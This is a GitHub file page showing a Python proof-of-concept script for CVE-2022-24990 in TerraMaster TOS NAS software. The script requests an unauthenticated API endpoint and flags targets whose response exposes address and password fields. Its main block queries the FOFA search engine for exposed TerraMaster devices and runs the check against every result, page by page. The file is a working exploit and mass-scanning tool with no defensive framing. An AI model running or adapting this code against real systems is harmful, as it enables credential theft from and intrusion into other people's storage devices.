-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2022-24990.py
38 lines (32 loc) · 1.27 KB
/
CVE-2022-24990.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from loguru import logger
from pocx import AioPoc
from pocx.funcs import Fofa
import json
class CVE_2022_24990(AioPoc):
def __init__(self):
super(CVE_2022_24990, self).__init__()
self.name = 'TerraMaster TOS Unauthenticated Attacker Vulnerability CVE-2022-24990'
self.cve = 'CVE-2022-24990'
async def poc(self, target: str):
url = target + "/module/api.php?mobile/webNasIPS"
try:
req = await self.aio_get(url=url)
result = json.loads(req.content.decode("utf-8"))['data']
if "successful" in req.content.decode("utf-8") and 'ADDR' in result and 'PWD' in result:
logger.success(f'[+]{target} is vulnerable')
return True
except Exception as e:
pass
logger.error(f"[-]{target} is not vulnerable")
return False
if __name__ == '__main__':
grammar = 'app="TERRAMASTER-NAS"'
poc = CVE_2022_24990()
fofa = Fofa()
fofa.set_config(api_key='xxxxxx', api_email='xxxxxx')
print(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')
pages = fofa.asset_pages(grammar)
for page in range(1, pages + 1):
print(f'[*] page {page}')
assets = fofa.assets(grammar, page)
poc.run(assets)